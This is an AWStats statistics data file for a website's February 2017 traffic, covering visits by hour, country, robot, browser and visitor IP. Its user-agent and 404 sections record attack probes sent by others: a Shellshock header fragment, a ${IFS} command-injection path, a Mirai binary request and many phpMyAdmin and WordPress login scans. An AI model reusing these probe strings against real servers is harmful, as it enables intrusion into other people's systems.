AWSTATS DATA FILE 6.8 (build 1.910)
# If you remove this file, all statistics for date 201702 will be lost/reset.

# Position (offset in bytes) in this file of beginning of each section for
# direct I/O access. If you made changes somewhere in this file, you should
# also remove completely the MAP section (AWStats will rewrite it at next
# update).
BEGIN_MAP 28
POS_GENERAL 1915                
POS_TIME 2602                
POS_VISITOR 21425               
POS_DAY 41484               
POS_DOMAIN 3553                
POS_LOGIN 4801                
POS_ROBOT 4956                
POS_WORMS 5813                
POS_EMAILSENDER 5944                
POS_EMAILRECEIVER 6087                
POS_SESSION 42283               
POS_SIDER 42488               
POS_FILETYPES 6222                
POS_OS 6516                
POS_BROWSER 6680                
POS_SCREENSIZE 7241                
POS_UNKNOWNREFERER 7315                
POS_UNKNOWNREFERERBROWSER 8195                
POS_ORIGIN 8703                
POS_SEREFERRALS 8847                
POS_PAGEREFS 9041                
POS_SEARCHWORDS 9706                
POS_KEYWORDS 9935                
POS_MISC 2266                
POS_ERRORS 10075               
POS_CLUSTER 4657                
POS_SIDER_404 10216               
POS_PLUGIN_geoip_city_maxmind 17200               
END_MAP

# LastLine    = Date of last record processed - Last record line number in last log - Last record offset in last log - Last record signature value
# FirstTime   = Date of first visit for history file
# LastTime    = Date of last visit for history file
# LastUpdate  = Date of last update - Nb of parsed records - Nb of parsed old records - Nb of parsed new records - Nb of parsed corrupted - Nb of parsed dropped
# TotalVisits = Number of visits
# TotalUnique = Number of unique visitors
# MonthHostsKnown   = Number of hosts known
# MonthHostsUnKnown = Number of hosts unknown
BEGIN_GENERAL 8
LastLine 20170301000437 1616 348250 14224612341574
FirstTime 20170201005305
LastTime 20170228185739
LastUpdate 20170301064155 1616 798 817 0 0
TotalVisits 488                 
TotalUnique 438                 
MonthHostsKnown 0                   
MonthHostsUnknown 532                 
END_GENERAL

# Misc ID - Pages - Hits - Bandwidth
BEGIN_MISC 10
QuickTimeSupport 0 0 0
JavaEnabled 0 0 0
JavascriptDisabled 0 0 0
PDFSupport 0 0 0
WindowsMediaPlayerSupport 0 0 0
AddToFavourites 0 0 0
RealPlayerSupport 0 0 0
TotalMisc 0 0 0
DirectorSupport 0 0 0
FlashSupport 0 0 0
END_MISC

# Hour - Pages - Hits - Bandwidth - Not viewed Pages - Not viewed Hits - Not viewed Bandwidth
BEGIN_TIME 24
0 91 609 48023723 330 380 8025194
1 113 944 94347289 317 347 7073643
2 74 516 49329061 310 358 10231903
3 82 480 42772434 353 379 9639939
4 78 515 53209970 344 381 8176776
5 48 401 45232529 368 400 6382779
6 82 618 62377751 426 486 8448745
7 67 440 46443402 393 450 10125936
8 63 185 13764122 330 348 5653294
9 46 136 9621645 342 354 5326413
10 105 512 49364940 309 338 6842442
11 51 325 30905797 294 323 5960969
12 47 192 18767029 327 377 8931244
13 39 354 32766446 364 387 6828850
14 36 154 15099382 360 402 7454552
15 31 111 8620763 353 384 9041798
16 63 159 7221651 319 362 9826810
17 43 125 9366769 423 456 6937819
18 24 35 1055839 335 359 8645864
19 8 23 830090 374 387 6209932
20 30 195 15847521 398 427 6425971
21 35 161 14576957 329 370 6448837
22 31 191 18464475 306 325 6084905
23 63 562 62468823 334 372 6868250
END_TIME

# Domain - Pages - Hits - Bandwidth
# The 10 first Pages must be first (order not required for others)
BEGIN_DOMAIN 69
in 409 4161 425962710
us 233 1326 108575429
unknown 131 746 64974752
ru 90 122 3851131
cn 47 47 1346774
id 43 482 49928694
ua 40 41 3171528
eg 29 29 1645611
kr 26 26 1422395
hk 23 221 22581830
tr 6 7 582341
rs 1 2 628198
my 4 4 228498
mx 0 1 278588
ro 5 6 580676
dk 2 2 144376
tn 1 1 72188
sg 1 2 350776
lb 1 1 72188
br 3 4 371473
kw 1 1 72188
mo 9 9 419616
np 2 2 81638
ao 1 1 72188
gr 1 1 72188
ch 5 5 360940
gb 15 84 8861932
eu 12 12 612416
bg 17 17 991961
it 3 7 1330916
hu 1 1 72188
pl 4 5 567340
ca 17 65 5793123
za 4 4 231930
sk 1 2 283075
lu 3 3 186535
ve 2 2 79910
na 1 1 13837
il 2 2 79910
ba 2 2 144376
ph 8 9 1500276
es 2 2 144376
lv 2 2 144376
fr 15 69 7689162
ma 1 1 72188
th 9 64 5967049
me 2 2 144376
cz 7 8 424886
mk 1 1 72188
by 0 1 210887
fi 15 137 13916180
de 18 18 1128615
hr 2 2 144376
ir 2 2 144376
be 4 4 226178
md 1 1 72188
jp 10 64 4927768
cl 5 5 296474
au 7 40 2942132
jo 2 2 144376
vn 5 6 507361
pk 1 1 72188
dz 2 2 144376
ar 7 7 133328
nl 21 22 1631126
bw 1 1 72188
lk 1 11 395758
nz 1 1 72188
ae 0 1 39105
END_DOMAIN

# Cluster ID - Pages - Hits - Bandwidth
BEGIN_CLUSTER 0
END_CLUSTER

# Login - Pages - Hits - Bandwidth - Last visit
# The 10 first Pages must be first (order not required for others)
BEGIN_LOGIN 0
END_LOGIN

# Robot ID - Hits - Bandwidth - Last visit - Hits on robots.txt
# The 10 first Hits must be first (order not required for others)
BEGIN_ROBOT 19
googlebot 5233 83435411 20170228235549 0
baiduspider 1285 43393952 20170228234430 0
no_user_agent 1013 3903445 20170228235914 0
bot[+:,\.\;\/\\-] 277 20267702 20170228161353 0
seznambot 122 8828869 20170228132204 0
sogou 65 5242437 20170228092658 0
yandex 58 6258852 20170228114425 0
phantom 35 1512676 20170213073233 0
python 11 688835 20170228115934 0
commons\-httpclient 8 273106 20170202141626 0
ia_archiver 6 391285 20170221112409 0
infobot 4 319645 20170217074744 0
[+:,\.\;\/\\-]bot 4 282967 20170213205211 0
surveybot 2 144376 20170219224351 0
mj12bot 2 144374 20170219100713 0
netcraft 3 144374 20170208103132 0
msnbot\-media 2 144724 20170224020718 0
crawl 4 155760 20170212034309 0
nutch 1 72187 20170209134147 0
END_ROBOT

# Worm ID - Hits - Bandwidth - Last visit
# The 5 first Hits must be first (order not required for others)
BEGIN_WORMS 0
END_WORMS

# EMail - Hits - Bandwidth - Last visit
# The 20 first Hits must be first (order not required for others)
BEGIN_EMAILSENDER 0
END_EMAILSENDER

# EMail - Hits - Bandwidth - Last visit
# The 20 first hits must be first (order not required for others)
BEGIN_EMAILRECEIVER 0
END_EMAILRECEIVER

# Files type - Hits - Bandwidth - Bandwidth without compression - Bandwidth after compression
BEGIN_FILETYPES 12
eot 29 798006 0 0
css 934 26567440 0 0
png 3314 546618158 0 0
ttf 90 13998976 0 0
woff 43 1672804 0 0
woff2 228 4110960 0 0
php 533 23602132 0 0
html 426 29694380 0 0
js 1424 49427233 0 0
jpg 903 53975756 0 0
jpeg 18 12168 0 0
Unknown 1 395 0 0
END_FILETYPES

# OS ID - Hits
BEGIN_OS 11
winlong 136
winxp 590
unix 1
win2000 2
winnt 4104
linux 2294
macosx 385
winunknown 235
win2003 11
linuxdebian 1
Unknown 184
END_OS

# Browser ID - Hits
BEGIN_BROWSER 38
firefox28.0 4
msie6.0 211
firefox15.0 1
firefox3.6 81
ibrowse 83
firefox44.0 2
firefox49.0 56
firefox31.0 13
msie8.0 119
firefox6.0.2 2
firefox43.0 11
msie7.0 88
firefox40.1 126
wget 2
msie9.0 8
Unknown 34
firefox11.0 2
firefox3.0.8 1
firefox48.0 4
libwww 1
opera 7
firefox21.0 23
firefox29.0 44
firefox3.5.2 12
firefox38.0 1
firefox46.0 2
firefox30.0 1
firefox45.0 1
firefox47.0 159
mozilla 668
firefox37.0 42
netscape5.0 5
firefox22.0 2
msie10.0 14
firefox51.0 458
firefox3.6.3 1
firefox15.0.1 1
safari 5653
END_BROWSER

# Screen size - Hits
BEGIN_SCREENSIZE 0
END_SCREENSIZE

# Unknown referer OS - Last visit date
BEGIN_UNKNOWNREFERER 16
Ruby 20170223164936
masscan/1.0_(https://github.com/robertdavidgraham/masscan) 20170211200412
Mozilla/5.0_Project_25499_(project25499.com) 20170218111806
Mozilla/5.0_zgrab/0.x 20170214024017
Mozilla/4.0_(compatible;_Synapse) 20170211060655
Scanbot 20170228105200
Opera/9.27 20170208101318
libwww-perl/6.17 20170206130509
Mozilla/5.0_(compatible;_Google-Site-Verification/1.0) 20170219152447
Mozilla/5.0_(compatible;_ips-agent) 20170202084530
www.probethenet.com_scanner 20170218124137
()_{_:;};echo;_/bin/bash_-c_\ 20170222104818
facebookexternalhit/1.1_(_http://www.facebook.com/externalhit_uatext.php) 20170227041131
BigDataCloud 20170206094932
CATExplorador/1.0beta_(sistemes_at_domini_dot_cat;_http://domini.cat/catexplorador.html) 20170227203017
Mozilla/4.0_(compatible;) 20170216202206
END_UNKNOWNREFERER

# Unknown referer Browser - Last visit date
BEGIN_UNKNOWNREFERERBROWSER 8
facebookexternalhit/1.1_(_http://www.facebook.com/externalhit_uatext.php) 20170227041131
Ruby 20170223164936
BigDataCloud 20170206094932
CATExplorador/1.0beta_(sistemes_at_domini_dot_cat;_http://domini.cat/catexplorador.html) 20170227203017
masscan/1.0_(https://github.com/robertdavidgraham/masscan) 20170211200412
www.probethenet.com_scanner 20170218124137
()_{_:;};echo;_/bin/bash_-c_\ 20170222104818
Scanbot 20170228105200
END_UNKNOWNREFERERBROWSER

# Origin - Pages - Hits 
BEGIN_ORIGIN 6
From0 650 921
From1 2 2
From2 72 134
From3 11 12
From4 615 6874
From5 0 0
END_ORIGIN

# Search engine referers ID - Pages - Hits
BEGIN_SEREFERRALS 4
google 67 129
mysearch 1 1
rambler 1 1
yandex 3 3
END_SEREFERRALS

# External page referers - Pages - Hits
# The 10 first Pages must be first (order not required for others)
BEGIN_PAGEREFS 11
http://naijaloyal.com.ng 2 2
http://calone.indiegroup.com/cymbalta/cymbalta-discounted-price.html 1 1
http://m.facebook.com 1 1
http://burger-imperia.com 1 1
http://exwebnisen.page.tl/Can-i-take-pepto-if-i-take-adderall.htm 1 1
http://b4businezz.com 1 1
http://anonymizeme.pro/go/hide.cgi 1 1
https://therapists.psychologytoday.com/rms/name/JoyfulMind+Therapy_Orlando_Florida_277511 1 1
https://www.facebook.com 1 1
http://googleweblight.com 1 1
http://blogging.eu.org/gallery/shimoga-airport-photos-alaska.html 0 1
END_PAGEREFS

# Search keyphrases - Number of search
# The 10 first number of search must be first (order not required for others)
BEGIN_SEARCHWORDS 3
styles+of+writing+for+writing+simple+interest 1
pyramids+skyline 1
oozaaoo 1
END_SEARCHWORDS

# Search keywords - Number of search
# The 10 first number of search must be first (order not required for others)
BEGIN_KEYWORDS 9
writing 2
of 1
for 1
styles 1
skyline 1
interest 1
pyramids 1
oozaaoo 1
simple 1
END_KEYWORDS

# Errors - Hits - Bandwidth
BEGIN_ERRORS 5
401 26 12922
302 43 4042
206 53 5573866
400 4 1446
404 891 395612
END_ERRORS

# URL with 404 errors - Hits - Last URL referer
BEGIN_SIDER_404 198
/phpMyAdmin-3.1.2.0-english/scripts/setup.php 1 -
/ 1 -
http://71.18.41.19:80/administrator/PMA/ 1 -
/phpMyAdmin-3.1.2.0-all-languages/scripts/setup.php 1 -
http://71.18.41.19:80/pma2012/ 1 -
/admin/config.php 1 -
/wordpress/ 2 -
http://71.18.41.19:80/db/ 1 -
/cgi/common.cgi 2 -
/stssys.htm 2 -
/phpMyAdmin-2.8.3/scripts/setup.php 1 -
http://71.18.41.19:80/php-my-admin/ 1 -
/phpMyAdmin-2.7.0-beta1/scripts/setup.php 1 -
/phpMyAdmin-2.6.5/scripts/setup.php 1 -
http://71.18.41.19:80/dbadmin/ 1 -
/js/Poof.. 1 -
http://71.18.41.19:80/sql/phpMyAdmin/ 1 -
/language/Swedish${IFS}&&echo${IFS}610cker>qt&&tar${IFS}/string.js 2 -
http://71.18.41.19:80/pma/ 1 -
/phpMyAdmin-2.6.4-pl3/scripts/setup.php 1 -
/php-my-admin/scripts/setup.php 1 -
/xmlrpc.php 5 -
/phpMyAdmin3/scripts/setup.php 1 -
http://71.18.41.19:80/sql/websql/ 1 -
/phpMyAdmin2/scripts/setup.php 1 -
http://71.18.41.19:80/admin/ 1 -
/bins/mirai.arm 1 -
http://71.18.41.19:80/phpMyAdmin4/ 1 -
/phpMyAdmin-2.8.5/scripts/setup.php 1 -
/phpMyAdmin-2.7.0-pl2/scripts/setup.php 1 -
http://71.18.41.19:80/sql/webdb/ 1 -
http://71.18.41.19:80/db/phpMyAdmin-3/ 1 -
/phpadmin/scripts/setup.php 2 -
http://71.18.41.19:80/phppma/ 1 -
//wp-login.php 1 -
http://71.18.41.19:80/admin/pMA/ 1 -
http://71.18.41.19:80/sql/myadmin/ 1 -
http://71.18.41.19:80/sql/phpmanager/ 1 -
http://71.18.41.19:80/db/phpMyAdmin3/ 1 -
http://71.18.41.19:80/myadmin/ 1 -
/v2/register 1 -
http://71.18.41.19:80/mysql/pMA/ 1 -
http://71.18.41.19:80/phpMyadmin/ 1 -
/js/click.validate 3 -
/phpMyAdmin/scripts/setup.php 1 -
/ct_if/ctpublic/Check_Exist.php 1 -
/wp-login.php 127 -
/cgi-bin/kerbynet 1 -
/System/Security/hylogin.aspx 2 -
//pma/scripts/setup.php 1 -
http://71.18.41.19:80/admin/sysadmin/ 1 -
http://71.18.41.19:80/program/ 1 -
/index.php'+deployAd[i].url+' 1 -
/js/scroll.affix.data-api 4 -
http://71.18.41.19:80/administrator/phpmyadmin/ 1 -
http://71.18.41.19:80/sql/php-myadmin/ 1 -
/_phpmyadmin/scripts/setup.php 2 -
http://71.18.41.19:80/mysql/admin/ 1 -
//phpmyadmin/scripts/setup.php 1 -
/phpMyAdmin-3.0.1.1/scripts/setup.php 1 -
/v2/privacy/ 1 -
http://71.18.41.19:80/db/websql/ 1 -
http://71.18.41.19:80/PMA/ 1 -
/phpMyAdmin-3.1.0.0-english/scripts/setup.php 1 -
/js/ui.resizable 3 -
http://71.18.41.19:80/sql/phpmy-admin/ 1 -
/mysql/scripts/setup.php 2 -
http://71.18.41.19:80/phpMyAdmin-3/ 1 -
/js/span.da-arrows-next 1 -
/phpMyAdmin-3.0.1.0/scripts/setup.php 1 -
http://71.18.41.19:80/sql/sqlweb/ 1 -
http://71.18.41.19:80/phpMyAdmin/ 1 -
/phpMyAdmin-2.7.0-pl1/scripts/setup.php 1 -
http://71.18.41.19:80/db/phpMyAdmin/ 1 -
/wp-admin/admin-ajax.php 2 -
http://71.18.41.19:80/admin/phpmyadmin/ 1 -
/phpMyAdmin-3.1.0.0/scripts/setup.php 1 -
/phpMyAdmin-2.6.6/scripts/setup.php 1 -
/phpMyAdmin-2.6.1-pl3/scripts/setup.php 1 -
/phpMyAdmin-3.1.2.0/scripts/setup.php 1 -
/phpMyAdmin-2.6.9/scripts/setup.php 1 -
http://71.18.41.19:80/administrator/admin/ 1 -
/websql/scripts/setup.php 1 -
/tmUnblock.cgi 2 -
http://71.18.41.19:80/db/webdb/ 1 -
http://71.18.41.19:80/phpmyadmin/ 1 -
/wp-content/plugins/simple-ads-manager/sam-ajax-admin.php 2 -
/admin/scripts/setup.php 2 -
/recordings/ 6 -
http://71.18.41.19:80/db/phpmyadmin/ 1 -
http://71.18.41.19:80/shopdb/ 1 -
http://71.18.41.19:80/sql/phpMyAdmin2/ 1 -
/cgi-bin/supervisor/CloudSetup.cgi 1 -
http://71.18.41.19:80/mysqladmin/ 1 -
http://71.18.41.19:80/phpMyAdmin3/ 1 -
/phpMyAdmin-2/scripts/setup.php 1 -
http://71.18.41.19:80/administrator/db/ 1 -
/readme.html 1 -
http://71.18.41.19:80/sql/webadmin/ 1 -
/squid-reports/ 2 -
http://71.18.41.19:80/phpmyadmin4/ 1 -
http://71.18.41.19:80/db/myadmin/ 1 -
http://71.18.41.19:80/administrator/web/ 1 -
/web/scripts/setup.php 1 -
http://71.18.41.19:80/sql/phpmyadmin2/ 1 -
http://71.18.41.19:80/db/dbadmin/ 1 -
http://71.18.41.19:80/sql/sqladmin/ 1 -
/admin/phpmyadmin/scripts/setup.php 2 -
/robots.txt 417 -
/admin/pma/scripts/setup.php 2 -
http://71.18.41.19:80/mysql/sqlmanager/ 1 -
http://71.18.41.19:80/mysql/web/ 1 -
/phpMyAdmin-2.8.2/scripts/setup.php 1 -
http://71.18.41.19:80/administrator/phpMyAdmin/ 1 -
http://71.18.41.19:80/admin/web/ 1 -
/phpMyAdmin-2.7.0-rc1/scripts/setup.php 1 -
http://71.18.41.19:80/2phpmyadmin/ 1 -
/phpMyAdmin-2.6.1-pl2/scripts/setup.php 1 -
/blog/feed 1 -
/images/domestic/trivandrum.png 36 http://oozaaoo.com/domestic.php
http://71.18.41.19:80/mysql-admin/ 1 -
http://71.18.41.19:80/MyAdmin/ 1 -
/plugins/weathermap/editor.php 1 71.18.41.195
/scripts/setup.php 2 -
http://71.18.41.19:80/mysql/mysqlmanager/ 1 -
http://71.18.41.19:80/phpmyadmin3/ 1 -
http://71.18.41.19:80/sql/sql-admin/ 1 -
http://71.18.41.19:80/mysql/pma/ 1 -
/feed 1 -
/js/input.length 4 -
/phpMyAdmin-2.7.5/scripts/setup.php 1 -
/images/4.png 2 http://www.oozaaoo.com/domestic.php
//cgi-sys/realsignup.cgi 1 -
/js/li.dropdown 1 -
http://71.18.41.19:80/mysql/ 1 -
/mybooking/ 1 -
/phpMyAdmin-2.7.6/scripts/setup.php 1 -
/myadmin/scripts/setup.php 2 -
http://71.18.41.19:80/admin/sqladmin/ 1 -
/a 1 -
http://71.18.41.19:80/sql/sql/ 1 -
/phpMyAdmin-2.6.4-rc1/scripts/setup.php 1 -
http://71.18.41.19:80/database/ 1 -
http://71.18.41.19:80/PMA2012/ 1 -
/register/ 1 -
http://71.18.41.19:80/db/webadmin/ 1 -
/admin/ 1 -
http://71.18.41.19:80/db/dbweb/ 1 -
/IMAGES/AB 1 -
/img/fav.png 52 http://www.oozaaoo.com/
http://71.18.41.19:80/phpmanager/ 1 -
http://71.18.41.19:80/phpmyadmin2/ 1 -
http://71.18.41.19:80/mysqlmanager/ 1 -
/xampp/phpmyadmin/scripts/setup.php 1 -
/mysqladmin/scripts/setup.php 2 -
http://71.18.41.19:80/mysql/db/ 1 -
http://71.18.41.19:80/PMA2011/ 1 -
/w00tw00t.at.blackhats.romanian.anti-sec:) 2 -
http://71.18.41.19:80/phpmyAdmin/ 1 -
/phpMyAdmin-3.4.3.1/scripts/setup.php 1 -
http://71.18.41.19:80/db/db-admin/ 1 -
/dbadmin/scripts/setup.php 2 -
/hndUnblock.cgi 2 -
/phpMyAdmin-2.8.2.3/scripts/setup.php 1 -
http://71.18.41.19:80/phpmy/ 1 -
/MyAdmin/scripts/setup.php 1 -
http://71.18.41.19:80/db/phpmyadmin3/ 1 -
/phpMyAdmin-3.1.1.0-all-languages/scripts/setup.php 1 -
/redirect.php 1 -
/phpmyadmin/scripts/setup.php 13 -
/typo3/phpmyadmin/scripts/setup.php 1 -
/blog/ 2 -
/muieblackcat 1 -
/wp/ 2 -
http://71.18.41.19:80/administrator/pma/ 1 -
http://71.18.41.19:80/phpMyAdmin2/ 1 -
/web/phpMyAdmin/scripts/setup.php 1 -
http://180.163.113.82/check_proxy 2 -
http://71.18.41.19:80/admin/phpMyAdmin/ 1 -
/blog/robots.txt 2 -
/command.php 2 -
/js/1.11.4 5 -
//recordings/LICENSE.txt 1 -
http://71.18.41.19:80/sqlmanager/ 1 -
/googlebe73d339611e97a4.html 1 -
/pma/scripts/setup.php 2 -
/contente.php%3Ffrench-essay-helper 1 http://oozaaoo.com/
/manager/html 2 -
/phpMyAdmin-2.7.7/scripts/setup.php 1 -
/db/scripts/setup.php 2 -
http://71.18.41.19:80/mysql/dbadmin/ 1 -
/phpMyAdmin-2.8.4/scripts/setup.php 1 -
/phpMyAdmin-2.6.4-pl4/scripts/setup.php 1 -
http://71.18.41.19:80/pma2011/ 1 -
/phpmyadmin/index.php 1 -
http://71.18.41.19:80/phpmy-admin/ 1 -
http://71.18.41.19:80/php-myadmin/ 1 -
http://71.18.41.19:80/admin/db/ 1 -
END_SIDER_404

# Plugin key - Pages - Hits - Bandwidth - Last access
BEGIN_PLUGIN_geoip_city_maxmind 162
unknown 0 3415 0 0
in_new%20delhi_07 0 908 0 0
in_madras_25 0 522 0 0
id_jakarta_04 0 479 0 0
us_barstow_ca 0 203 0 0
us_mountain%20view_ca 0 187 0 0
in_chennai_25 0 161 0 0
in_calcutta_28 0 149 0 0
in_kochi_13 0 149 0 0
in_hyderabad_02 0 147 0 0
us_lincoln_ma 0 1 0 0
ua_kiev_13 0 1 0 0
fr_boissy-saint-léger_a8 0 60 0 0
cz_vrch_81 0 2 0 0
sg_singapore_00 0 1 0 0
us_sterling_va 0 7 0 0
jp_tokyo_40 0 60 0 0
us_sulphur_ok 0 1 0 0
us_san%20diego_ca 0 2 0 0
cn_changchun_05 0 4 0 0
us_palo%20alto_ca 0 13 0 0
ro_focsani_40 0 1 0 0
be_gent_08 0 1 0 0
br_são%20paulo_27 0 1 0 0
us_san%20bruno_ca 0 2 0 0
be_brussels_11 0 1 0 0
ph_philippine_10 0 1 0 0
us_overland%20park_ks 0 8 0 0
de_jettingen_02 0 1 0 0
us_malvern_pa 0 3 0 0
us_redmond_wa 0 5 0 0
tr_istanbul_34 0 4 0 0
nl_utrecht_09 0 1 0 0
cl_santiago_12 0 4 0 0
ru_ural_39 0 1 0 0
us_downers%20grove_il 0 70 0 0
rs_belgrade_00 0 1 0 0
de_nürnberg_02 0 3 0 0
us_gilbert_az 0 1 0 0
de_brunswick_06 0 1 0 0
ar_tucumán_24 0 1 0 0
us_mount%20laurel_nj 0 1 0 0
gb_alexandria_w7 0 1 0 0
ca_ottawa_on 0 60 0 0
cn_langfang_10 0 4 0 0
jp_hiroshima_11 0 1 0 0
mx_garza%20garcía_19 0 1 0 0
dk_holstebro_18 0 1 0 0
me_podgorica_00 0 1 0 0
it_eboli_04 0 1 0 0
eg_gizeh_08 0 1 0 0
me_crna%20gora_00 0 1 0 0
fr_nantes_b5 0 1 0 0
fr_Étoile-sur-rhône_b9 0 1 0 0
nl_rotterdam_11 0 11 0 0
cn_shenzhen_30 0 6 0 0
bg_sofia_42 0 2 0 0
us_norwalk_ct 0 1 0 0
cn_nanchang_03 0 1 0 0
ir_hamedan_31 0 1 0 0
ru_ulyanovsk_81 0 1 0 0
na_windhoek_21 0 1 0 0
pl_polska_77 0 1 0 0
it_milan_09 0 1 0 0
ru_voronezh_86 0 1 0 0
us_elk%20grove_ca 0 1 0 0
us_detroit_mi 0 90 0 0
il_tel%20aviv_05 0 1 0 0
th_chiang%20mai_02 0 1 0 0
mk_skopje_41 0 1 0 0
us_dallas_tx 0 1 0 0
in_agra_36 0 70 0 0
vn_hanoi_44 0 1 0 0
mo_macau_01 0 9 0 0
us_bakersfield_ca 0 5 0 0
us_vancouver_wa 0 1 0 0
nl_soesterberg_09 0 1 0 0
nl_dedemsvaart_15 0 1 0 0
cz_prerov_84 0 1 0 0
cz_krásná%20hora_88 0 1 0 0
us_bellmawr_nj 0 1 0 0
kr_seoul_11 0 1 0 0
in_pondicherry_22 0 116 0 0
nl_amsterdam_07 0 1 0 0
ro_oradea_05 0 1 0 0
gb_prestwick_w4 0 76 0 0
br_guarulhos_27 0 1 0 0
ru_moscow_48 0 39 0 0
ve_caracas_25 0 2 0 0
ba_zenica_01 0 1 0 0
ca_montreal_qc 0 1 0 0
ph_muntinlupa%20city_53 0 1 0 0
us_auburn%20hills_mi 0 13 0 0
sk_bratislava_02 0 2 0 0
us_canton_mi 0 2 0 0
us_ann%20arbor_mi 0 1 0 0
es_l'hospitalet%20de%20llobregat_56 0 1 0 0
lk_colombo_36 0 1 0 0
th_bangkok_40 0 60 0 0
pl_warsaw_78 0 1 0 0
ae_abu%20dhabi_01 0 1 0 0
fr_bordeaux_97 0 1 0 0
us_washington_dc 0 12 0 0
nz_auckland_e7 0 1 0 0
in_pune_16 0 1 0 0
ro_azuga_09 0 1 0 0
ph_caloocan_f2 0 1 0 0
hr_zagreb_21 0 2 0 0
my_kuala%20lumpur_14 0 2 0 0
fr_Évry_a8 0 2 0 0
id_tangerang_30 0 1 0 0
tr_ankara_68 0 1 0 0
us_durham_nc 0 1 0 0
in_bangalore_19 0 1 0 0
ua_boryspil_13 0 1 0 0
ru_volgograd_84 0 6 0 0
us_torrington_ct 0 1 0 0
ro_vaslui_38 0 1 0 0
br_rio%20de%20janeiro_21 0 1 0 0
us_columbus_oh 0 1 0 0
cl_viña%20del%20mar_01 0 1 0 0
gb_reading_k7 0 1 0 0
bw_gaborone_09 0 1 0 0
us_woodbridge_nj 0 48 0 0
us_fort%20huachuca_az 0 1 0 0
ru_novosibirsk_53 0 1 0 0
my_penang_09 0 1 0 0
eg_cairo_11 0 27 0 0
gf_cayenne_00 0 1 0 0
us_fort%20worth_tx 0 1 0 0
cn_beijing_22 0 15 0 0
ar_buenos%20aires_07 0 6 0 0
ru_saint%20petersburg_66 0 6 0 0
dk_copenhagen_17 0 1 0 0
us_easton_pa 0 1 0 0
hu_vác_16 0 1 0 0
cz_prague_52 0 2 0 0
us_los%20angeles_ca 0 1 0 0
gb_london_h9 0 2 0 0
tr_orta_07 0 1 0 0
in_ahmadabad_09 0 1 0 0
us_ewa%20beach_hi 0 1 0 0
ru_nizhnii%20tagil_71 0 3 0 0
in_mumbai_16 0 119 0 0
nl_woerden_11 0 1 0 0
bg_kazanlak_59 0 1 0 0
de_waldkraiburg_02 0 1 0 0
ua_kharkov_07 0 2 0 0
hk_central%20district_00 0 3 0 0
us_virginia%20beach_va 0 1 0 0
ru_kazan_73 0 1 0 0
fi_espoo_13 0 137 0 0
us_seattle_wa 0 137 0 0
ru_chertanovo_69 0 20 0 0
gr_sérrai_05 0 1 0 0
es_santander_39 0 1 0 0
us_wilmington_de 0 123 0 0
pl_lomza_81 0 1 0 0
it_prato_16 0 1 0 0
gb_belfast_r3 0 1 0 0
ro_galati_18 0 1 0 0
au_melbourne_07 0 36 0 0
END_PLUGIN_geoip_city_maxmind

# Host - Pages - Hits - Bandwidth - Last visit date - [Start date of last visit] - [Last page of last visit]
# [Start date of last visit] and [Last page of last visit] are saved only if session is not finished
# The 10 first Hits must be first (order not required for others)
BEGIN_VISITOR 532
92.63.107.242 30 30 7911 20170208101325
101.222.255.87 28 235 26072639 20170210104305
163.121.188.3 27 27 1501235 20170214002051
106.248.234.43 25 25 1350207 20170210061309
122.165.111.97 23 231 22224487 20170202045947
202.61.120.110 20 218 22494198 20170220234627
61.3.157.101 20 230 30877007 20170224235844
80.240.221.38 20 20 1102222 20170210083247
106.208.46.143 16 146 17216751 20170201020451
117.209.164.224 15 155 18546542 20170222055246
123.249.45.68 1 1 72188 20170228081041
107.167.111.39 12 108 11385925 20170227065450
89.210.179.74 1 1 72188 20170206111236
174.127.133.56 0 1 2081 
66.220.156.114 0 1 57438 
195.64.206.242 1 1 72188 20170208073815
174.127.133.43 0 6 159666 
54.219.177.179 5 25 986461 20170223164935
54.183.152.123 1 1 72188 20170223152134
89.248.172.98 1 1 72188 20170209210800
101.63.76.76 0 1 57438 
131.253.27.46 1 8 703182 20170227044108
88.71.57.101 1 1 72188 20170216105255
163.172.160.182 1 1 7722 20170208170534
177.65.140.83 1 1 72188 20170212092304
89.164.254.160 1 1 72188 20170209204104
151.70.64.63 1 1 72188 20170212150631
64.233.173.143 7 58 4497890 20170208134552
70.95.29.36 0 1 148293 
61.2.39.1 13 55 4066077 20170217004340
49.207.186.223 8 121 12582238 20170204113659
101.176.211.3 4 4 173564 20170212070301
122.174.170.146 0 1 76024 
88.17.249.195 1 1 72188 20170213135341
194.8.251.6 1 1 72188 20170205020623
79.137.85.189 1 1 72188 20170224234020
24.53.45.71 1 1 72188 20170217054108
181.110.233.210 8 8 368 20170211060655
191.190.206.239 1 1 72187 20170209211523
62.210.70.188 2 2 175273 20170212164157
123.7.38.145 9 9 414 20170210045517
69.119.21.8 0 1 210887 
89.84.81.76 1 1 72188 20170205232712
157.55.13.64 1 1 72362 20170212001135
88.163.180.215 6 60 7132231 20170212144317
104.224.1.23 1 1 72188 20170213044036
185.104.120.3 3 3 152098 20170210061109
89.108.182.146 1 1 72188 20170210130315
178.222.112.182 1 1 72188 20170208102949
89.64.60.152 0 1 278588 
195.254.232.178 0 1 278588 
103.200.76.171 6 35 6485962 20170214073722
64.233.172.145 2 32 3239946 20170208134526
117.2.193.243 1 1 72188 20170201104831
94.102.48.195 1 1 72187 20170211200412
188.187.1.169 6 6 0 20170214122229
219.91.218.118 1 1 72188 20170211064538
78.99.131.189 1 1 72188 20170211064632
106.208.106.54 5 58 5488653 20170201014719
49.145.40.241 1 1 72188 20170205225648
46.165.34.201 3 3 87632 20170211074240
106.208.136.126 3 7 969322 20170221011737
112.205.75.29 1 1 72188 20170204211436
62.24.181.134 1 1 11408 20170220054232
194.165.147.154 1 1 72188 20170216103454
192.129.221.214 1 1 72188 20170216013850
105.28.97.35 7 7 304196 20170206095820
117.194.205.193 0 1 57438 
84.221.245.21 1 1 72188 20170205080326
213.57.89.62 1 1 7722 20170207023446
94.54.90.179 1 1 72188 20170214045348
203.197.136.69 10 133 13402598 20170223050557
42.111.204.31 5 56 5480364 20170218145321
188.71.231.205 1 1 72188 20170208091641
78.125.198.209 1 1 72188 20170213034127
31.41.27.75 1 1 72188 20170216055510
139.162.119.197 3 3 216564 20170218053224
54.213.242.62 1 1 72188 20170228014547
138.197.111.48 1 13 508462 20170205203702
117.207.112.131 5 46 3983522 20170207004650
197.89.23.43 0 2 1401395 
94.55.230.242 1 1 72188 20170204180425
187.67.139.10 0 1 278588 
70.60.36.163 0 1 57438 
69.62.226.69 1 1 72188 20170211205902
81.154.170.232 1 1 72188 20170222150252
195.142.92.181 1 1 72188 20170222132002
69.63.188.100 0 1 57438 
157.50.5.45 4 72 7053413 20170215230828
59.89.253.45 5 56 5480364 20170220124110
203.88.138.218 1 1 72188 20170212045353
